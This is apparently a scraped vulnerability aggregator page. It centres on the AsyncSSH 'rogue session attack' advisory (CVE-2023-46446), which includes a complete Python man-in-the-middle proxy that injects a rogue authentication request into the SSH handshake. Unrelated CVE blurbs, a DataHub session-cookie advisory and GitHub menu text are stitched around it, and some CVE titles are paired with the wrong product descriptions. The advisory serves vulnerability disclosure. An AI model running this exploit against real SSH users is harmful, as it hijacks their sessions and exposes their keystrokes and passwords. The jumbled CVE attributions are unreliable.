The rogue session attack targets any SSH client connecting to an AsyncSSH server, on which the attacker must have a shell account. The goal of the attack is to log the client into the attacker's account without the client being able to detect this. At that point, due to how SSH sessions interact with shell environments, the attacker has complete control over the remote end of the SSH session. The attacker receives all keyboard input by the user, completely controls the terminal output of the user's session, can send and receive data to/from forwarded network ports, and is able to create signatures with a forwarded SSH Agent, if any. The result is a complete break of the confidentiality and integrity of the secure channel, providing a strong vector for a targeted phishing campaign against the user. For example, the attacker can display a password prompt and wait for the user to enter the password, elevating the attacker's position to a MitM at the application layer and enabling perfect shell emulation.

The attacks work by the attacker injecting a chosen authentication request before the client's NewKeys. The authentication request sent by the attacker must be a valid authentication request containing his credentials. The attacker can use any authentication mechanism that does not require exchanging additional messages between client and server, such as password or publickey. Due to a state machine flaw, the AsyncSSH server accepts the unauthenticated user authentication request message and defers it until the client has requested the authentication protocol.

**PoC**AsyncSSH 2.14.0 client (simple\_client.py example) connecting to AsyncSSH 2.14.0 server (simple\_server.py example)

#!/usr/bin/python3
import socket
from threading import Thread
from binascii import unhexlify
from time import sleep

##################################################################################
\## Proof of Concept for the rogue session attack (ChaCha20-Poly1305)            ##
\##                                                                              ##
\## Variant: Unmodified variant (EXT\_INFO by client required)                    ##
\##                                                                              ##
\## Client(s) tested: AsyncSSH 2.14.0 (simple\_client.py example)                 ##
\## Server(s) tested: AsyncSSH 2.14.0 (simple\_server.py example)                 ##
\##                                                                              ##
\## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ##
##################################################################################

\# IP and port for the TCP proxy to bind to
PROXY\_IP \= '127.0.0.1'
PROXY\_PORT \= 2222

\# IP and port of the server
SERVER\_IP \= '127.0.0.1'
SERVER\_PORT \= 22

\# Length of the individual messages
NEW\_KEYS\_LENGTH \= 16
CLIENT\_EXT\_INFO\_LENGTH \= 60
\# Additional data sent by the client after NEW\_KEYS (excluding EXT\_INFO)
ADDITIONAL\_CLIENT\_DATA\_LENGTH \= 60

newkeys\_payload \= b'\\x00\\x00\\x00\\x0c\\x0a\\x15'
def contains\_newkeys(data):
    return newkeys\_payload in data

rogue\_userauth\_request \= unhexlify('000000440b320000000861747461636b65720000000e7373682d636f6e6e656374696f6e0000000870617373776f7264000000000861747461636b65720000000000000000000000')
def insert\_rogue\_authentication\_request(data):
    newkeys\_index \= data.index(newkeys\_payload)
    \# Insert rogue authentication request and remove SSH\_MSG\_EXT\_INFO
    return data\[:newkeys\_index\] + rogue\_userauth\_request + data\[newkeys\_index:newkeys\_index + NEW\_KEYS\_LENGTH\] + data\[newkeys\_index + NEW\_KEYS\_LENGTH + CLIENT\_EXT\_INFO\_LENGTH:\]

def forward\_client\_to\_server(client\_socket, server\_socket):
    delay\_next \= False
    try:
        while True:
            client\_data \= client\_socket.recv(4096)
            if delay\_next:
                delay\_next \= False
                sleep(0.25)
            if contains\_newkeys(client\_data):
                print("\[+\] SSH\_MSG\_NEWKEYS sent by client identified!")
                if len(client\_data) < NEW\_KEYS\_LENGTH + CLIENT\_EXT\_INFO\_LENGTH + ADDITIONAL\_CLIENT\_DATA\_LENGTH:
                    print("\[+\] client\_data does not contain all messages sent by the client yet. Receiving additional bytes until we have 156 bytes buffered!")
                while len(client\_data) < NEW\_KEYS\_LENGTH + CLIENT\_EXT\_INFO\_LENGTH + ADDITIONAL\_CLIENT\_DATA\_LENGTH:
                    client\_data += client\_socket.recv(4096)
                print(f"\[d\] Original client\_data before modification: {client\_data.hex()}")
                client\_data \= insert\_rogue\_authentication\_request(client\_data)
                print(f"\[d\] Modified client\_data with rogue authentication request: {client\_data.hex()}")
                delay\_next \= True
            if len(client\_data) \== 0:
                break
            server\_socket.send(client\_data)
    except ConnectionResetError:
        print("\[!\] Client connection has been reset. Continue closing sockets.")
    print("\[!\] forward\_client\_to\_server thread ran out of data, closing sockets!")
    client\_socket.close()
    server\_socket.close()

def forward\_server\_to\_client(client\_socket, server\_socket):
    try:
        while True:
            server\_data \= server\_socket.recv(4096)
            if len(server\_data) \== 0:
                break
            client\_socket.send(server\_data)
    except ConnectionResetError:
        print("\[!\] Target connection has been reset. Continue closing sockets.")
    print("\[!\] forward\_server\_to\_client thread ran out of data, closing sockets!")
    client\_socket.close()
    server\_socket.close()

if \_\_name\_\_ \== '\_\_main\_\_':
    print("--- Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ---")
    mitm\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
    mitm\_socket.bind((PROXY\_IP, PROXY\_PORT))
    mitm\_socket.listen(5)

    print(f"\[+\] MitM Proxy started. Listening on {(PROXY\_IP, PROXY\_PORT)} for incoming connections...")

    try:
        while True:
            client\_socket, client\_addr \= mitm\_socket.accept()
            print(f"\[+\] Accepted connection from: {client\_addr}")
            print(f"\[+\] Establishing new server connection to {(SERVER\_IP, SERVER\_PORT)}.")
            server\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
            server\_socket.connect((SERVER\_IP, SERVER\_PORT))
            print("\[+\] Spawning new forwarding threads to handle client connection.")
            Thread(target\=forward\_client\_to\_server, args\=(client\_socket, server\_socket)).start()
            Thread(target\=forward\_server\_to\_client, args\=(client\_socket, server\_socket)).start()
    except KeyboardInterrupt:
        client\_socket.close()
        server\_socket.close()
        mitm\_socket.close()

**Impact**

The impact heavily depends on the application logic implemented by the AsyncSSH server. In the worst case, the AsyncSSH server starts a shell for the authenticated user upon connection, switching the user to the authenticated one. In this case, the attacker can prepare a modified shell beforehand to perform perfect phishing attacks and become a MitM at the application layer. When the username of the authenticated user is not used beyond authentication, this vulnerability does not impact the connection's security.

CVE-2023-46446: Rogue Session Attack in AsyncSSH

An issue in Yasukawa memberscard v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-45560: CVE-reports/CVE-2023-45560.md at main · syz913/CVE-reports

An issue in Golden v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token.

CVE-2023-45558: CVE-reports/CVE-2023-45558.md at main · syz913/CVE-reports

DataHub is an open-source metadata platform. DataHub Frontend's sessions are configured using Play Framework's default settings for stateless session which do not set an expiration time for a cookie. Due to this, if a session cookie were ever leaked, it would be valid forever. DataHub uses a stateless session cookie that is not invalidated on logout, it is just removed from the browser forcing the user to login again. However, if an attacker extracted a cookie from an authenticated user it would continue to be valid as there is no validation on a time window the session token is valid for due to a combination of the usage of LegacyCookiesModule from Play Framework and using default settings which do not set an expiration time. All DataHub instances prior to the patch that have removed the datahub user, but not the default policies applying to that user are affected. Users are advised to update to version 0.12.1 which addresses the issue. There are no known workarounds for this vulnerability.

**Summary**

DataHub Frontend's sessions are configured using Play Framework's default settings for stateless session which do not set an expiration time for a cookie. Due to this, if a session cookie were ever leaked, it would be valid forever.

**Details**

DataHub uses a stateless session cookie that is not invalidated on logout, it is just removed from the browser forcing the user to login again. However, if an attacker extracted a cookie from an authenticated user it would continue to be valid as there is no validation on a time window the session token is valid for due to a combination of the usage of LegacyCookiesModule from Play Framework and using default settings which do not set an expiration time.

**PoC**

Take a PLAY\_SESSION cookie from an expired session and attempt to use it with a curl request with other proper headers set, the cookie will be accepted as valid despite any length of time passing.

**Impact**

All DataHub instances prior to the patch will accept any session token created at any point in time as valid for the user it is valid for.

**Credit**

Dor Konis - GE Vernova

Source

CVE